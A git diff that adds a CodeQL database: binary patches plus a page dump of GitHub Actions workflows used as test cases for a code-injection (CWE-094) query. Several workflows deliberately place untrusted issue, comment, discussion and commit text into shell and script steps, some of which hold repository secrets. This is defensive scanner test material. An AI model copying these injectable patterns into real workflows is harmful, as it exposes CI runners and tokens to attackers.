z-p)Ga>`B98s+Z2XiK{lsGuqqEdWkP?uCvrxKk@LRJ?~61k9nB~zM(m`#EEK+oyq3f z(=sPYoKwun8MY|--!yUZ52sExGgr+Qdz5|L(wsfP7KLw}IQ0OZB(_cB*y|jYIJY;a z9~?hBCXOG*H71E3Ifm=b?woDTIm8F5v(Y)%TyqtM zD(234iL++7{B?e4&RXN{P+Xl06Q}kW*WPq4G7taGQD?3>`5_*Zc`q?%t@uabmz#5* z@qyz1io|&j!nv2OGLQX2$=lV5>-lot$i4_`G(0ZBC5LjcU!EI}*nSe7xA5iHH4a zVs|A@p0S7DZ60w3|BX3&NDF?y_pW@BnxauZPbW_OF!nXEXU*laFjQ;rJfArA1J`q%Kbo^9e4y0Ni-{9I zoPGS0dBg&zZeKEw_=CS}PQ9^SRAZgLnp5B803{EvnNvH=fwJB=5@)^e;gUBK5Bm{f zZ<&XG?BQ>lQ^&-EvcK<{D_12RlsMl{93Su{#6C3dThE`EN6t{i(D^iRe89(xeU>;m zV{cR|oqr|Hx`KaUPM^G?#QA07#0l5FETT1b=IcB6HTJ0Tya;QaukTt**;}-~xaR6| Z=7sl)vp4hg{VQtt3C`Sba!D)v{{YT;I}ZQ= literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/locations_default.rel.checksum b/db/db-yaml/default/locations_default.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..03a4aef720e484065375574c17a9a760156d9e3a GIT binary patch literal 12 RcmZQzU|?hbf+ISNGXVrd0gM0u literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/pools/0/buckets/info b/db/db-yaml/default/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..cd70331e4c890dbea42420922676a5295c6ac512 GIT binary patch literal 40 dcmZQz00Tw{#Q>$*|AY9`S3Yh7(c(-BQUES?1O)&9 literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/pools/0/buckets/page-000000 b/db/db-yaml/default/pools/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..8cbf6df672d50f404488bb5fc1472b6e689524e5 GIT binary patch literal 8192 zcmcJN1CVCR5`<@M+qP}nwr$(qyS8!H-fP>oZQIuSdM10fw(t38_Qi|W5%p(QW>$5d ziMc0PT->R+=+iKHw4Ri@BgR~R?y_gC>FZg;@F^za<;Egez`oQg)GTQZ(gZUv2EC6q zf_yITT`vk}f_ubYQ0992VSHQ0U|&)5y~j1Tha_ zyt3wgOj7w?!xOA;rm=KNKM|{ zlFST~J7oA^9~Pb>pN^_&GA|kKV$GEe|9_o+`86~-HcJ{GJa|3i3fY7%dF zUD_mie#s1oMjP(4cZ+0nS?VR~I6DV|87OxSYVM@&+CbkT;@+}> zR+!v7nw=VWZf{j;8h(uk&-qd3WyHD4k27;4&_B{$_0V_HXIKA^7FAOJqfl}rbTsPL zAb*s;a-jKm3r_<4MEyg7?%Hh9lJV|w!QKPr8}E~MweorCyHLNW?adwt}PCkAKo=JtuqwAJ5c2{XS( z1*bHkg?BbKIpb|?{EG!ZW= zUQVhy)siYexwC`X!X3q_54rnI`e*fqeEPdA61w~y?&tq>?&jWag72?t?*4DD9l$^V z<|~3tw0Ago5UrE;jusXp^I&kdzwb4XPXoWCW*bTGPd|_vDcy~gFx>T})n_ofDx)`a zCg+g^i2vPa_)L@c@&}N)5qh2APM1Ftp|v#H>wc+lj4-qCJ#)|RK{l!_hqztFizblV z+-c-X=xe&GN)p-J^4>$tO5UA%!h|m2_gUK*o)7*N`Jxds zCKgZMRc4Efr-HyA>YJJG2qG8SMHkrrMtViu^;YmL#npE=`Zmp#*Yyj*4b(T(YUNgt zdD6_RG+bksKuWq3Qm!YvL3bP$<`o_!a|^XD#=a`(X_R&AesVv->56|YV*Z%sN-4j@ z>~T^i_2YwmFVKI&zP|$fYP1KaSE$*>D{XjEv;IY~%QVyE``@V!Cr^`Bzs&VMrz&(GH|nQ=~}@4&lP`T*F`WSl&QnoK=M zEtdDI$t=}(cQP8$3nzv7yHt(H)FL^OI!xunuWd5D49AWY zhunJR+EC9>ov9Ck4AQ^OIir*zzl>T)y+N&K=hhhayRlh#wG;9E>OGf{@!2SB$6MA= z?hF;CfftEaF8-{S=ahNytrxAh&*4wW|IA^GH+99j1OG4TPI#9fR~)TwpdnpyrUiai z-FrzWqWPBGUZXG6p4-rKpg#eAWqe0(((XoN*O+@JN%!$ekfv&~81H>}X4Cupcy^7T z&LYeK4^i&qh{z^5|NhOR>|)LKA(C3$rEfL6RvP`^n=UHfi*8}IC$%q;xjkn8Y;s+g z9U76JZF2sm1>|a(Y-aJ*;2A>6B4*rdb@Zj+3TkhR3|9Qvl!Whd7Ed#CAeh@}-kDZj z^B`k)c>eZfWJZ!1!2TXVw!M}tm%iUGy$t-5%tOIGH`X*li(2=ca`|OG9?Z?)y?LlI z=I`R7WulfvXv-tCQ0f-k>HWq=zuEBB1j_o5u&3!un5>cGQlf9?J9-A+Vl$3+!(XKx z!;INXe5^dzHceue%k(BQhRSB<+L^f@&~G4D(}geNx75s~hZj&^ z3QURrM#Qr8=A99CTouF-%x5Gw-vrVIbEEKflWS`-j(#2VzD-Vct#%wkJVhU#T;`5# zfjQ0e&6q7`vd#e^A8wx7l1FUAerww;>F#h?7-3_Eo zkMR78?vOmb0UtNq(}JEv;90Z#o(O-w@vVJ@(ci)-&);B>v>x;)#0!C?_4nB%Ej4{1 
zX@2Juo+N_fnOUH@H71uAJ}lU0?6_a#rINTAoXA^lFf)&#_0#+8tm6#=VIKWaX}5zP N8$Z8x_A{EJ{{h2qJBR=P literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/0/info b/db/db-yaml/default/pools/0/info new file mode 100644 index 0000000000000000000000000000000000000000..973b70fb15116e4f998ef8f5b6a62593c9526151 GIT binary patch literal 33 ZcmZQz00U-51_q`z5H!_m_hto?vCp~^jBYpLjWBQ1Y!UH literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/pools/0/metadata/page-000000 b/db/db-yaml/default/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..60d89d0166f9fc32e6b58c35f33c5268e1a4119d GIT binary patch literal 16384 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 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/0/pageDump/page-000000000 b/db/db-yaml/default/pools/0/pageDump/page-000000000 new file mode 100644 index 00000000000..e8abb81542c --- /dev/null +++ b/db/db-yaml/default/pools/0/pageDump/page-000000000 
@@ -0,0 +1,55 @@ +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV +|name: Check info- uses: ... kout@v2runs-on ... 
-latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do + echo "$file was changed" +done +name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' +run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... 
atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" +exit 1 +name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV +name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels +name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... 
added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV +Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} +name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... 
ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') +name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments +name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV +name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV +name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... 
itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV +name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release +cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . +name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV +name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} +name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} +name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... 
nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV +env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" +git fetch --all +git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} +git cherry-pick -x ${{github.event.after}} --strategy-option theirs +git push -u origin ${{env.auto_branch}} +hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" +GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} + +### Cherry-picking: +[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + +### Pull request: +${{ env.ISSUE_BODY_PARSED }} +GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... 
# safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" +name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT +name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" +name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" +name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: sinkjob1:on: 